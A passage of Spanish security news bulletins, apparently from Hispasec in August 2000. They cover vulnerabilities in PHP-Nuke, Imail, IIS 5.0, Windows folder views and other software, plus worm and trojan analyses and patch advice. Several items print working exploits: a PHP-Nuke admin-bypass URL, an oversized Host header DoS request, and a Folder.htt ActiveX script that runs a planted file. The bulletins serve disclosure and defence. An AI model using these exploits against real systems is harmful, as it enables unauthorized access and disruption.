if(isset($admin)) {
if(!IsSet($mainfile)) { include("mainfile.php3"); }
$admin = base64_decode($admin);
$admin = explode(":", $admin);
$admin becomes null
$aid = "$admin[0]";
$pwd = "$admin[1]";

dbconnect();
$result=mysql_query("select pwd from authors where aid='$aid'");
if(!$result) {

echo "Selection from database failed!";
exit;
} else {
list($pass)=mysql_fetch_row($result);
if($pass == $pwd) {

$admintest = 1;
}
}
}

El problema reside en un error en la programación, ya que basta con
hacer $pass==$pwd. El valor de $pass proviene del valor de
mysql_fetch_row() que puede ser cualquier valor, o puede ser FALSE si
no existen más filas. Por lo que basta conseguir que $pwd (tipo cadena)
y $pass (tipo booleano) iguales a falso para que se cumpla la
condición. La expresión "if($pass == $pwd)" sólo compara valores, no el
tipo de los valores, por lo que si $pwd="" (null) será igual (no
idéntico) a el valor falso de $pass.

Simplemente bastará con introducir cualquier valor como valor de admin
para que deje acceder al sistema como tal. Al introducir la URL
http://sitio_vulnerable.com/admin.php3?admin=cualquiera ya permitirá el
acceso al menú de administración y bastará seguir combinando y
añadiendo el parámetro admin=cualquiera en las urls del sistema de
administración para que permita realizar cualquier acción.

Para remediarlo se puede instalar la versión PHP-Nuke 3.0 recientemente
publicada o bien añadir la línea 37 del archivo auth.inc.php3 para que
ponga :
if($aid=="" || $pwd=="") exit;



Antonio Ropero
antonior@hispasec.com


Más información:

Securityfocus:
http://www.securityfocus.com/vdb/?id=1592

PHP-Nuke:
http://www.ncc.org.ve/php-nuke.php3

Bugtraq:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=Pine.LNX.
.4.20.0008211558160.3828-100000@Ono-Sendai.hack.net



domingo, 20 de agosto de 2000

Los Gobiernos hablan sobre Seguridad Informática en ISSE 2000

El segundo Congreso ISSE, Information Security Solutions Europe, que
se celebrará del 27 al 29 de septiembre en el Palau Congressos
Catalunya, Barcelona, va a determinar el camino a seguir en el campo
de la seguridad informática. Muchas de las autoridades más importantes
del mundo van a intervenir en el congreso, que va a proporcionar una
tribuna definitiva para cualquier persona o entidad que se dedique a
las tecnologías de la seguridad.
ISSE 2000 contará con la intervención de destacadas figuras
gubernamentales, lo que prueba la importancia que los gobiernos y
autoridades internacionales de toda Europa conceden a la seguridad
como un factor esencial para el éxitoy la aceptación del comercio
electrónico.

El congreso se abre con la intervención de Anna Birulés, la Ministra
española de Ciencia y Tecnología y Ulrich Sandl, del Ministerio
alemán de Economía y Tecnología. Del otro lado del Atlántico llegan
James Ladouceur, Jefe de la Unidad de Comercio Electrónico de Política
Criptográfica de Canadá y William Reinsch, Subsecretario de Comercio,
Oficina de Administración de Exportaciones del Departamento de
Comercio de los Estados Unidos, que tratarán la evolución de la
política de encripción hasta hoy, explicarán su base lógica y su
filosofía esencial y describirán la situación en que se encuentra en
la actualidad. El último día de la conferencia, el Comisario europeo
para la Sociedad de la Información y las Empresas, Erkki Liikanen,
nos ofrecerá la perspectiva europea sobre la seguridad informática.

A lo largo del programa, habrá presentaciones que abarcarán toda la
gama de aspectos de seguridad, desde el marco legal de la criptografía
y las expectativas de la biométrica hasta las PKI empresa a empresa,
las identidades digitales, la protección de la intimidad y del
consumidor y las aplicaciones a la empresa.

Más de 50 organizaciones se unirán a los Patrocinadores de Platino
AddTrust, Entrust Technologies, GlobalSign y Tivoli, en la zona de la
exposición que se celebrará paralelamente al congreso. La entrada a la
exposición es gratuita y permite a los visitantes descubrir una gran
cantidad de nuevos productos y creaciones.

ISSE 2000 ha sido organizado por EEMA - el Foro Europeo para el
Comercio Electrónico, conjuntamente con TeleTrustT - la Asociación
para la Promoción de la Fiabilidad en las Tecnologías de la
Información y la Comunicación. El acontecimiento cuenta también con
el apoyo de la Comisión Europea, el Ministerio alemán de Economía y
Tecnología y la Cámara de Comercio de Barcelona y con el patrocinio
de AddTrust, Entrust Technologies, GlobalSign y Tivoli.

Teniendo en cuenta que la seguridad informática se considera uno de
los factores esenciales para el éxito y el crecimiento del comercio
electrónico, ISSE tiene un importante papel en la tarea de informar a
las pequeñas, medianas y grandes empresas de los problemas y las
soluciones que les permitirán tener una infraestructura segura de
tecnologías de la información y comunicación y beneficiarse así de la
revolución del comercio electrónico.

Para más información sobre ISSE 2000, pónganse en contacto con
isse@eema.org, llamen al teléfono +44 (0) 1386 793028 o visiten
la página web de ISSE, donde encontrarán todos los detalles:
http://www.eema.org/isse



Catherina Rolinson
EEMA Marketing
Catherina.rolinson@eema.org


Más información:

Programa ISSE 2000
http://www.eema.org/isse/program/ISSEProgram-final.asp

ISSE 2000
http://www.eema.org/isse



sábado, 19 de agosto de 2000

Denegación de servicio en Imail Server

El servidor de correo de IPSwitch Imail 6.0 se ve afectado por una
vulnerabilidad de denegación de servicios al manejar de forma
inadecuada las cabeceras de las peticiones HTTP 1.1.
El problema se presenta cuando se realiza una petición con el valor del
parámetro Host: demasiado largo, lo que causa que el servicio se caiga,
pero cuando esto ocurre no se liberan los recursos que empleaba por lo
que puede permitir a un atacante repetir el proceso de forma continua
para acaparar la memoria del servidor.

El error se produce cuando se envía más de 500 bytes en el parámetro
Host:, lo que hace que el hilo sobreescriba el puntero Base, y anule
todas las operaciones de dicho hilo. Para ello basta realizar la
siguiente petición:

GET / HTTP/1.1
Host: AAAAAAAA(x500)

Como los recursos del hilo no se liberan puede llegar a emplearse el
ataque para consumir grandes cantidades de memoria del servidor y por
tanto conseguir incluso provocar la caída total de la máquina.

IPSwitch ha publicado la actualización necesaria para solucionar el
problema que puede encontrarse en
http://www.ipswitch.com/support/patches-upgrades.html#IMail



Antonio Ropero
antonior@hispasec.com


Más información:

Aviso de eEye:
http://www.eeye.com/html/advisories/AD20000817.html



viernes, 18 de agosto de 2000

Código al descubierto en Microsoft IIS 5.0

De nuevo, como ya ocurriera con la conocida vulnerabilidad "::$DATA"
en Windows NT, una petición HTTP especialmente construida permite
visualizar el código fuente de las páginas scripts que se ejecutan en
el servidor Internet Information Server de Windows 2000.
Las páginas .HTML suelen contener código que el cliente necesita
descargar en su sistema para que el navegador lo interprete. Existen
otras páginas, cómo las ASP, HTR o ASA, que contienen scripts que son
interpretados en el lado del servidor web, y el cliente sólo recibe
el resultado del proceso.

Así, por ejemplo, una página ASP puede contener una plantilla HTML y
los scripts para acceder y recoger la información de una base de datos
que se encuentra en el servidor. El cliente, por su parte, cuando
llama a la página ASP sólo recibe una página HTML construida por el
servidor a partir de la plantilla y la información seleccionada de la
base de datos. En ningún caso el cliente debería poder visualizar el
código fuente de los scripts que acceden a la información, ya que
podría contener la localización y contraseñas de las bases de datos
e información sensible que comprometen la seguridad del servidor.

La vulnerabilidad se produce cuando se realiza una petición GET donde
se incluye el parámetro "Translate: f" en la cabecera HTTP, de manera
que el cliente recibe el código fuente completo de la página a la que
hace referencia. Hay que recordar que, a diferencia de la
vulnerabilidad "::$DATA", no se puede introducir éste parámetro de
forma directa en la URL desde un simple navegador, lo que a priori
dificulta que los usuarios noveles puedan realizar este ataque. Si
bien, ya existen numerosos scripts circulando por Internet que ofrecen
todo tipo de facilidades para explotar esta vulnerabilidad.

La cabecera "Translate: f" es una especificación legítima de WebDEV,
"Web-based Distributed Authoring and Versioning", un conjunto de
extensiones del protocolo HTTP que permiten a los usuarios la
administración remota. "Translate: f" es utilizado para poder editar
los ficheros, y como es normal suele ir acompañada de información
adicional para autentificar al usuario y no permitir a cualquiera
acceder a la información, detalle que parece ha pasado por alto
Microsoft en su implementación para el soporte de esta funcionalidad
desde FrontPage 2000.

Microsoft ha facilitado un parche pasa solucionar la vulnerabilidad
que deberán instalar los usuarios afectados de Internet Information
Server 5.0, distribuido junto con Windows 2000. Puede ser descargado
desde:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=23769

Esta vulnerabilidad también es corregida por el Service Pack 1 para
Windows 2000, opción recomendada ya que también soluciona otros
problemas adicionales:
http://www.microsoft.com/windows2000/downloads/recommended/sp1/default.asp



Bernardo Quintero
bernardo@hispasec.com


Más información:

Patch Available for "Specialized Header" Vulnerability
http://www.microsoft.com/technet/security/bulletin/MS00-058.asp

FAQ Microsoft Security Bulletin (MS00-058)
http://www.microsoft.com/technet/security/bulletin/fq00-058.asp

Translate:f summary, history and thoughts
http://www.ntbugtraq.com/default.asp?pid=36&sid=1&A2=ind0008&L=ntbugtraq&F=&S=&P=3045



jueves, 17 de agosto de 2000

Ataque DoS a Watchguard Firebox II

El envío de una URL mal construida al servicio de autentificación de
Firebox II, por defecto el puerto 4100, puede provocar que el servicio
deje de responder, siendo necesario el reinicio de la aplicación para
restaurarlo.
Firebox II, de Watchguard, es un cortafuegos que se vende con el
hardware y el software integrado en la misma solución. La "caja roja"
de Watchguard encierra un Pentium a 200Mhz, 64MB de SDRAM, 3 interfaces
de red RJ-45 10/100, y la ausencia de disco duro, para evitar sus
posibles fallos, la suple con 8MB de memoria Flash. El apartado
software se sustenta en una versión reforzada de Linux kernel 2.0.

El servicio de autentificación de Firebox II soporta varios protocolos,
y existe una versión basada en un applet de Java que permite el
acceso multiplataforma de cara al cliente.

Del ataque DoS no se conocen más detalles, excepto que es provocado
por el envío de una URL mal construida al puerto del servicio de
autentificación y que, según Watchguard, no se debe a un
desbordamiento de búfer.

Las primeras soluciones pasaban por impedir el acceso al servicio de
autentificación desde el exterior, si bien ya existe un Service
Pack que corrige el problema y que los usuarios registrados pueden
descargar de http://www.watchguard.com/support

Más información:

Watchguard Firebox Authentication DoS
http://www.vigilante.com/security/advisories/VIGILANTE-2000005.htm

Firebox II
http://www.watchguard.com/products/fIImss.asp




Redacción Hispasec
redaccion@hispasec.com



miércoles, 16 de agosto de 2000

Gusano "Loveletter.bd", alerta media en el norte de Europa

Una nueva variante del famoso "ILoveYou" acaba de ser reportada
"in-the-wild", al conseguir infectar a cientos de ordenadores en pocas
horas, lo que ha llevado a las principales casas antivirus a situarlo
en alerta media. Como característica a destacar, además del ya típico
autoenvío a través del correo electrónico, este gusano descarga un
troyano que roba información sensible de los usuarios que conecten con
los servicios del banco suizo UBS.
"Loveletter.bd" llega en un mensaje con el asunto "resume" y el
fichero adjunto "RESUME.TXT.VBS". Cuando se intenta abrir el fichero,
que simula un archivo de texto, el gusano crea "RESUME.TXT" y muestra
su contenido con el Bloc de Notas, para hacer creer al usuario que,
efectivamente, se trataba de un simple texto:

"Knowledge Engineer, Zurich"

"Intelligente Agenten im Internet sammeln Informationen, erklaren
Sachverhalte im" "Customer Service, navigieren im Web, beantworten
Email Anfragen oder verkaufen" "Produkte. Unsere Mandantin
entwickelt und vermarktet solche Software-Bots: State of the"
"Art des modernen E-Commerce. Auftraggeber sind fuhrende Unternehmen,
die besonderen" "Wert auf ein effizientes Customer Care Management
legen. Das weltweit aktive," "NASDAQ kotierte Unternehmen mit Sitz
in Boston braucht zur Verstarkung seines" "explosiv wachsenden Teams
in der Schweiz engagierte, hochmotivierte und kreative" [..]

Una vez ha mostrado este mensaje, el gusano se copia en el directorio
de sistema de Windows (Windows\System). A continuación, se distribuye
autoenviándose a todas los contactos de la libreta de direcciones de
Outlook del sistema infectado, con la misma rutina que el gusano
"LoveLetter" original, en un mensaje con el asunto y contenido ya
comentados. Después del envío, escribe una entrada en el registro
de Windows, (HKEY_CURRENT_USER\Software\ACH0\), que le sirve al
gusano como marca para no repetir el lanzamiento de mensajes en ese
sistema.

Lo más destacado de este gusano es que intenta descargar un troyano
en el caso de que el usuario cuente con el programa "UBS Pin", del
banco suizo UBS, encargado de los servicios de banca electrónica y
que maneja, entre otra información, los números de cuenta y
contraseñas. Este programa se localiza a través de la entrada en el
registro (HKEY_CURRENT_USER\Software\UBS\UBSPIN\Options\Datapath).

El componente troyano, "hcheck.exe", en un intento de pasar
desapercibido, se descarga de alguno de los tres FTP públicos que
tiene registrados el gusano. Estos sitios corresponden a servidores
universitarios y gubernamentales de Estados Unidos, donde existe
gran tráfico, número de usuarios, y se permite tanto la carga y
descarga indiscriminada de ficheros.

Cuando se ejecuta el troyano, se sitúa en memoria y recoge toda
la información del usuario infectado: nombre, empresa, software
instalado, dirección, datos de la red, nombre de usuario y
contraseñas de acceso a Internet. Además, también puede interceptar
el búfer del teclado, lo que le permite recoger cualquier dato que
el usuario escriba, cómo por ejemplo cuando se autentifica ante un
servicio en línea.

La información recolectada se envía al autor del virus vía
correo electrónico en un mensaje con el asunto "contract" y sin
destinatario aparente, pero con copia oculta a las direcciones:
ct102356@excite.com, acch01@netscape.net y deroha@mailcity.com.
Después de esta acción, el troyano ejecuta el fichero de proceso
por lotes "cfile.bat", que borra cualquier evidencia de su
existencia y lo hace desaparecer del sistema.

Las mayores incidencias de este virus se están detectando en Rusia,
norte de Europa, y de forma especial en Suiza, además de algunos
casos destacables de infecciones corporativas, como ha ocurrido con
dos bancos en Estados Unidos.

La rápida actuación de las casas antivirus, que ya detectan y
eliminan al gusano, los consejos aun frescos de la Campaña
Nacional Antivirus para evitar éste tipo de especímenes, y el
hecho de que esté dirigido a usuarios alemanes y suizos, hacen
pensar en una baja incidencia en el mundo hispano.



Bernardo Quintero
bernardo@hispasec.com


Más información:

UBS AG
http://www.ubs.ch/

CNET
http://news.cnet.com/news/0-1005-200-2540566.html

National Infrastructure Protection Center Information System Alert
http://www.nipc.gov/warnings/alerts/2000/alert00-053.htm

MSNBC
http://www.msnbc.com/news/447320.asp

The Register
http://www.theregister.co.uk/content/1/12656.html

AVP
http://www.avp.ch/avpve/worms/email/lovebd.stm

CAI
http://www.cai.com/virusinfo/virusalert.htm#vbsresumea

NAi
http://vil.nai.com/villib/dispvirus.asp?virus_k=98789

Panda Software
http://www.pandasoftware.es/enciclopedia/gusano/VBSLoveLetterBD_1.htm

Proland Software
http://www.protectorplus.com/virus_info/worms/loveletterbd.htm

Sophos
http://www.sophos.com/virusinfo/analyses/vbsloveletbd.html

Symantec
http://www.sarc.com/avcenter/venc/data/vbs.loveletter.bd.html

Trend Micro
http://www.antivirus.com/pc-cillin/vinfo/virusencyclo/default5.asp?VName=VBS_LOVELETTR.BD&VSect=T



martes, 15 de agosto de 2000

Vulnerabilidad con IE y las carpetas de Windows 98 y 2000

Georgi Guninski, ya habitual en nuestras noticias por sus continuos
descubrimientos de vulnerabilidades, vuelve en esta ocasión con una
nueva alerta que afecta a sistemas con Windows 98 y 2000.
El aviso publicado por Guninski alerta de la posibilidad de ejecución
arbitraria de archivos accesibles bajo el Entorno de Red de Microsoft
en sistemas con Windows 98 y IE 5.x. Mientras que bajo Windows 2000 el
problema puede ser más grave ya que con la configuración por defecto
puede llevar al compromiso de la cuenta de administrador.

En esta ocasión el peligro radica en la característica que poseen los
sistemas afectados para mostrar las carpetas como páginas web, lo cual
permite la inclusión de contenido activo que se visualizará cuando se
acceda a la carpeta remota o local.

La forma en que la carpeta se muestra cuando se visualiza como una
página web está controlado por el archivo «Folder.htt» localizado en la
propia carpeta. Este fichero es un tipo especial de html que puede
contener scripts y objetos ActiveX.

Para visualizar los archivos de una carpeta se debe usar el control
ActiveX Shell DefView, que básicamente contiene las funcionalidades del
Explorador antiguo. Este control incluye el método InvokeVerb que se
usa para realizar acciones con el archivo seleccionado, como mostrar
sus propiedades, abrirlo o ejecutarlo. Este método toma una cadena con
la acción a realizar con el archivo como parámetro, Microsoft ha
tratado de proteger dicho método pero ha quedado un pequeño problema
residual en el cual se basa esta vulnerabilidad.

Si se efectúa la llamada a InvokeVerb() sin ningún parámetro, este
ejecutará la acción por defecto sobre el archivo, que es Abrir
(Ejecutar). Por lo que para llevar a cabo el ataque un usuario
malicioso puede crear una carpeta y situar el programa o archivo que se
desee ejecutar, por ejemplo «a.bat». En esta carpeta también debe
situar el un archivo «Folder.htt», como el siguiente:

<html>
<body >
<script>
setTimeout("f()",2000);
function f() {
FileList.focus();
FileList.FocusedItem.InvokeVerb();
}
</script>
<H1>Hola !! </H1>
<object id=FileList border=0 tabindex=1
classid="clsid:1820FED0-473E-11D0-A96C-00C04FD705A2">
</object>
</body>
</html>

El código sitúa el foco en el primer archivo de la carpeta mediante
FileList.focus(), en este caso el archivo «a.bat» preparado, mientras
que FileList.FocusedItem.InvokeVerb() ejecuta (abre) el archivo sobre
el que previamente se ha situado el foco.

Microsoft se ha mostrado disgustada por la publicación de este aviso
por parte de Guninski, al señalar que realizó su difusión tan sólo 12
horas después de avisarles lo que pena les dio tiempo para reaccionar e
investigar el problema. Por otra parte desde la multinacional se ha
restado importancia a la gravedad del problema, al afirmar que es
necesario disponer de acceso físico a la máquina que se desea
comprometer. Como solución temporal se recomienda desactivar la opción
de visualizar carpetas como páginas web para todos los usuarios.



Antonio Ropero
antonior@hispasec.com


Más información:

CNet

Securityfocus

Bugtraq



lunes, 14 de agosto de 2000

Virus "Cybernet", ¿alerta por generación espontánea?

En estas últimas horas han sido muchos los medios que han alertado
sobre el virus "Cybernet", la mayoría tomando como referencia a la
compañía Panda Software. Si bien es cierto que el virus existe, sus
efectos son dañinos, y se activa el 17 de agosto, no hay datos que
induzcan a pensar en incidencias significativas.
Para algunos incluso puede sonar contradictorio, teniendo en cuenta
que el virus fue descubierto en mayo de este año, y que la Campaña
Nacional AntiVirus dirigida por la propia Panda Software, que tenía
como fin "limpiar España de virus", tuvo lugar a finales de julio.
De manera independiente a los datos de incidencias reales que el
día 17 se puedan dar, la crítica burda se presenta fácil.

Tampoco son muy afortunadas las declaraciones que circulan, puestas
en boca del director técnico de Secuware, donde se aconseja eliminar
el día 17 todos los mensajes de correo de los cuales no conozcan su
procedencia. Parece que lo único que puede conseguir es confundir a
la opinión pública mezclando el día de activación con la fase de
propagación e infección del virus. Además, muchos virus se propagan
autoenviándose a los contactos de la libreta de direcciones, en un
mensaje con la dirección de remite del usuario infectado, por lo que
las personas que reciban el virus conocerán con toda probabilidad al
usuario que supuestamente lo envía y su procedencia.

El día 17 deberán de guardar las mismas precauciones con los
mensajes de correo electrónico que cualquier otro día del año. Y
si de "Cybernet" se trata, basta con tener precaución con los
documentos de Word y Excel adjuntos, en los que el virus se propaga
e infecta durante cualquier época del año, sin necesidad de borrar
el mensaje al recibirlo si no se conoce al remitente. Por descontado,
los usuarios de antivirus actualizados se encuentran fuera de
peligro.

Todo parece indicar que, en realidad, se trata de un "rebrote" de la
nota que Panda, junto con el resto de casas antivirus, sacaron a
finales de mayo, y que alguna agencia de noticias habría mantenido
la fecha de activación apuntada en el calendario para sacar la
oportuna noticia momentos antes.

Cómo nota informativa, siempre y cuando no se convierta en una alarma,
no hay nada que reprochar, más bien todo lo contrario. Nadie puede
asegurar lo que ocurrirá el día 17, aunque todo parece indicar que no
habrá grandes incidencias, ya que todos los antivirus reconocen a
"Cybernet" desde finales de mayo. Sin embargo, nunca está de más
informar a los usuarios los peligros que pueden acechar, y recordarles
que deben mantener sus antivirus actualizados y seguir unos consejos
básicos.

En esa línea, desde Hispasec vamos a aprovechar esta nota para
recordar algunos de los muchos virus que pueden activarse el día
17 de agosto:

*Andreev
Virus DOS, el mes de agosto se activa y destruye el sector de
arranque de la unidad C:

*Aref/890
Virus DOS, se activa los jueves para borrar la CMOS

*Argentina
Virus DOS, se activa el 17 de agosto y muestra el siguiente mensaje:
"17 de Agosto Aniversario de la defunción del Gral. San Martin"

*BlackIce
Virus DOS, se activa en agosto para borrar todos los ficheros
del disco duro.

*Cybernet
Virus Macro, el 17 de agosto y el 25 de diciembre borra la unidad C:

*Deicide/622/623
Virus DOS, del 3 al 18 de agosto muestra un mensaje en pantalla.

*Dilber
Gusano Internet, el 17 de cada més infecta con el virus VBS.FreeLink

*Dieg
Virus DOS, en agosto realiza un efecto gráfico en la pantalla.

*MyPics/b
Gusano Internet, el 17 de cada més borra ficheros.

*NightFreddy
Virus DOS, en agosto borra la MBR y la CMOS

*ZGB
Virus DOS, el 17 de abril y agosto borra los ficheros de la unidad.



Bernardo Quintero
bernardo@hispasec.com


Más información:

Secuware aconseja eliminar mañana cualquier correo electrónico
http://es.news.yahoo.com/000816/4/hyek.html

iBrujula
http://ibrujula.com/news/noticia.php3?id=8668

PCWorld
http://www.idg.es/canal/ShowID.asp?ID=10710

MAP
http://www.map.es/csi/pg7060.htm#13

AVP
http://www.avp.ch/avpve/macro/xmulti/cybernet.stm

CAi
http://www.cai.com/virusinfo/encyclopedia/descriptions/cyberneta.htm

NAi
http://vil.nai.com/villib/dispVirus.asp?virus_k=98659

Panda Software
http://www.pandasoftware.es/enciclopedia/macro/word/O97MCybernetA_1.htm

Sophos
http://www.sophos.com/virusinfo/analyses/of97cyberneta.html

Symantec
http://www.symantec.com/avcenter/venc/data/o97m.cybernet.html

Trend Micro
http://www.antivirus.com/pc-cillin/vinfo/virusencyclo/default5.asp?VName=O97M_CYBERNET.A



domingo, 13 de agosto de 2000

Parche de seguridad para Office 2000

Las aplicaciones de Office 2000, el paquete de ofimática de Microsoft,
pueden sufrir un desbordamiento de búfer que provoca el cierre de
la aplicación o, lo más grave, la ejecución de código arbitrario.
El desbordamiento de búfer se produce en el interprete de HTML que
forma parte de Office 2000, más en concreto en el módulo que
interpreta las etiquetas <OBJECT>, utilizadas para hacer referencia
a los controles Active X, documentos de Office y scripts en las
páginas webs.

Un atacante puede explotar esta vulnerabilidad si crea un documento
HTML, que introduzca un argumento de longitud excesiva en las
etiquetas <OBJECT>, y lo guarde como un documento de Office. Cuando
la víctima abra el documento, los datos de más, contenidos en la
etiqueta <OBJECT>, desbordarán el tamaño del búfer y provocarán
el cierre de la aplicación o la ejecución de código arbitrario,
según se haya construido el argumento.

Las aplicaciones de Office afectadas son Word, Excel y Powerpoint,
todas ellas en su versión 2000. Recomendamos a todos los usuarios
afectados instalen el parche que pueden descargar en:

http://officeupdate.microsoft.com/2000/downloadDetails/Of9data.htm



Bernardo Quintero
bernardo@hispasec.com


Más información:

Vulnerabilidad "Microsoft Office HTML Object Tag"
http://www.microsoft.com/technet/security/bulletin/MS00-056.asp

Microsoft Office 2000 HTML Data Security Update Available
http://support.microsoft.com/support/kb/articles/q269/8/80.asp



sábado, 12 de agosto de 2000

Parche para Internet Explorer 4.x/5.x

Un parche para el navegador de Microsoft elimina dos nuevas
vulnerabilidades que permitían desde una página web leer ficheros
de los ordenadores que la visitaran.
La primera de las vulnerabilidades nos llega de la mano del español
Cuartango, y ha sido bautizada por Microsoft cómo "Scriptlet
Rendering". Está relacionada con Microsoft Scriptlet Component, el
control ActiveX encargado de tratar en Internet Explorer los scripts
de las páginas HTML. Dicho control, en teoría, sólo debe de
interpretar ficheros de tipo HTML, sin embargo también lo hace con
otros ficheros.

Si desde una página web se introduce un script en un archivo cuya
localización en el disco del usuario sea conocida, es posible usar
el control ActiveX para ejecutar el script que lleve en su interior
en la zona de seguridad local, donde tendrá privilegios de lectura.
Todos los ficheros que el navegador permite abrir pueden ser leídos
y enviados al atacante. Por ejemplo, los ficheros tipo .txt, .js y
.htm pueden ser motivo de este ataque, pero no los .exe o .dat.

La segunda de las vulnerabilidades, "Frame Domain Verification",
fue corregida en mayo de este año, si bien ahora se ha descubierto
una nueva variante. En resumen, la vulnerabilidad explota la
posibilidad que desde un mismo documento web se puedan intercambiar
datos entre las subventanas o frames que lo forman, aun estando
éstas en diferentes dominios y zonas de seguridad.

Así, por ejemplo, un frame puede contener una página web de un
servidor, y estar en la zona de Internet, y otro frame del mismo
documento estar visualizando un fichero del disco duro del
usuario, en la zona local. En el momento que ambos frames pueden
intercambiar información, las zonas local e Internet se funden,
y contenidos del usuario local pueden ser transmitidos al servidor
web.

Recomendamos a todos los usuarios de Internet Explorer, en sus
versiones 4.x y 5.x, instalen el parche que corrige ésta y otras
vulnerabilidades anteriores que recordamos en el apartado "Más
información" de esta nota. Pueden descargarlo en:

http://www.microsoft.com/windows/ie/download/critical/patch11.htm



Bernardo Quintero
bernardo@hispasec.com


Más información:

Vulnerabilidad "Scriptlet Rendering"
http://www.microsoft.com/technet/security/bulletin/MS00-055.asp

Vulnerabilidades "Frame Domain Verification",
"Unauthorized Cookie Access", y "Malformed Component Attribute"
http://www.microsoft.com/technet/security/bulletin/ms00-033.asp

Vulnerabilidad "SSL Certificate Validation"
http://www.microsoft.com/technet/security/bulletin/ms00-039.asp

Vulnerabilidad "Active Setup Download"
http://www.microsoft.com/technet/security/bulletin/ms00-042.asp

Vulnerabilidad "Office HTML" y "IE Script"
http://www.microsoft.com/technet/security/bulletin/ms00-049.asp



viernes, 11 de agosto de 2000

"Qaz": troyano, backdoor y gusano

Se esconde en los sistemas Windows cómo si de la aplicación Bloc de
Notas se tratara, abre una puerta trasera en los equipos infectados
para permitir el control remoto, y se propaga por las unidades
compartidas de las redes locales. Este polifacético espécimen,
que ha provocado tantas nomenclaturas diferentes entre las casas
antivirus como funcionalidades posee, ha sido reportado "in-the-wild",
si bien no se prevé consiga mayor difusión al no tener autonomía
para propagarse más allá de las redes locales.
"Qaz" es un ejecutable Win32, escrito en Visual C++. Cuando se
ejecuta, busca una copia del fichero NOTEPAD.EXE (Bloc de Notas
de la carpeta Windows) y lo renombra como NOTE.COM, a continuación
"Qaz" se copia con el nombre de NOTEPAD.EXE. Ésto provoca que,
cada vez que se intente lanzar el Bloc de Notas en un sistema
infectado, primero se ejecuta el troyano, y éste a su vez llama a
NOTE.COM, por lo que el usuario no percibe a primera vista ninguna
irregularidad.

Para asegurar su ejecución en cualquier caso, "Qaz" se lanza cada
vez que el sistema se inicia, para conseguirlo modifica el registro
de Windows con la siguiente entrada:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
StartIE=C:\WINDOWS\notepad.exe qazwsx.hsq

El troyano es capaz de propagarse a través de las unidades compartidas
de las redes locales, donde intenta localizar la carpeta de Windows,
buscando la cadena "WIN", y realiza con NOTEPAD.EXE la misma operación
ya descrita. El hecho de que no disponga de otro método de propagación
a través de Internet, cómo por ejemplo autoenviarse a través de correo
electrónico, limita el ámbito de actuación de este espécimen como
gusano. Así mismo, en el terreno de los virus, tan sólo podría
catalogarse como "virus de compañía", ya que tampoco puede infectar a
otros ficheros, por lo que aun merma más su capacidad de expansión.

Por último, destaca en "Qaz" su funcionalidad como backdoor, envía la
dirección IP de los ordenadores infectados a su autor vía correo
electrónico (a buzones localizados en China), y abre una puerta
trasera en el puerto TCP 7597, por el cual el autor del virus puede
acceder de forma remota al sistema de sus víctimas.

Los comandos soportados como backdoor comprenden la ejecución de
programas, la posibilidad de enviar ficheros al sistema infectado,
y la desactivación de "Qaz". Aunque muy básicos, estos comandos
permiten el poder instalar herramientas más sofisticadas para
controlar de forma remota los sistemas, o introducir nuevos virus.

Una forma fácil de comprobar si estamos infectados es comparar el
tamaño del NOTEPAD.EXE de nuestro sistema, cuyo original ronda
los 50kb (estaremos fuera de peligro, al menos de "Qaz"), mientras
que el troyano se sitúa entorno a los 120kb (infectados).

Para eliminar "Qaz" basta con localizar el fichero original con el
que fuimos infectados, que podremos haber recibido vía correo
electrónico, descargado de una web, u otra vía, así como el
NOTEPAD.EXE, y borrar ambos. En el caso de que la infección sea a
través de red local es probable que NOTEPAD.EXE sea también el
fichero origen de la infección. A continuación renombraremos el
fichero NOTE.COM a NOTEPAD.EXE, y por último eliminamos la entrada
que incluía en el registro de Windows con la utilidad REGEDIT.EXE.
En el caso de que el equipo infectado se encuentre en una red
local, aconsejamos examinar el resto de máquinas conectadas a
la misma.



Bernardo Quintero
bernardo@hispasec.com


Más información:

AVP
http://www.avp.ch/avpve/worms/net/qaz.stm

NAi
http://vil.nai.com/villib/dispvirus.asp?virus_k=98775

Panda Software
http://www.pandasoftware.es/vernoticia.asp?noticia=752

Symantec
http://www.sarc.com/avcenter/venc/data/qaz.trojan.html

Trend Micro
http://www.antivirus.com/pc-cillin/vinfo/virusencyclo/default5.asp?VName=TROJ_QAZ.A



jueves, 10 de agosto de 2000

Grave vulnerabilidad en Statistics Server

Statistics Server 5.02x presenta un desbordamiento de pila en su
componente web que permite, a cualquier usuario, la ejecucion de
código arbitrario en el servidor de forma remota.
Statistics Server permite analizar el tráfico de los servidores web en
tiempo real gracias a su funcionalidad "Live Stats". La utilidad
permite gestionar y consultar las estadísticas con un simple navegador
a través de una interfaz web.

Nemo e Izan, dos componentes de DeepZone (http://www.deepzone.org/),
han descubierto que el servicio web de Statistics Server no es capaz
de manejar una petición con un tamaño excesivo, alrededor de unos
2033 bytes, lo que provoca un desbordamiento de búfer. Una petición
de estas características, construida de forma especial, permite la
ejecución de código arbitrario en el servidor remoto.

MediaHouse ha puesto a disposición el parche 5.03 que corrige la
vulnerabilidad, y recomienda su instalación inmediata a todos los
usuarios de Statistics Server en sus versiones para Windows NT 4.0
y Windows 2000.

Parche 5.03 Statistics Server (LiveStats)
http://www.mediahouse.com/statisticsserver/download_trial/dist/ss50.exe



Redacción Hispasec
redaccion@hispasec.com


Más información:

Aviso y exploit en DeepZone
http://www.deepzone.org/advisories/ss502xspa.txt

Statistics Server
http://www.mediahouse.com/statisticsserver/



miércoles, 9 de agosto de 2000

Vulnerabilidades en CommuniGate Pro v3.2.4

El servidor de correo CommuniGate Pro posee un servicio web que
permite escalar directorios fuera de su ámbito, a través de peticiones
"../..", y leer cualquier fichero del sistema. La explotación de esta
vulnerabilidad, junto con otras funcionalidades del programa, permite
el acceso remoto como root.
CommuniGate Pro es un servidor de correo comercial utilizado como
enrutador de mensajes SMTP y acceso a los mensajes a través de POP,
IMAP y HTTP, entre otros. Cuenta con versiones para una gran cantidad
de plataformas, si bien las vulnerabilidades que nos ocupan han sido
probadas en la distribución Linux de la versión 3.2.4.

Por defecto, el servidor de correo ofrece un servicio HTTP que permite
a los usuarios recibir y mandar mensajes a través de la web en el
puerto TCP 8100, al mismo tiempo que facilita al administrador la
configuración y gestión remota del servidor de correo por el puerto
8010.

CommuniGate nos ofrece una URL para acceder de forma directa a la guía
web del usuario, tras mapear /Guide/ a un subdirectorio de la
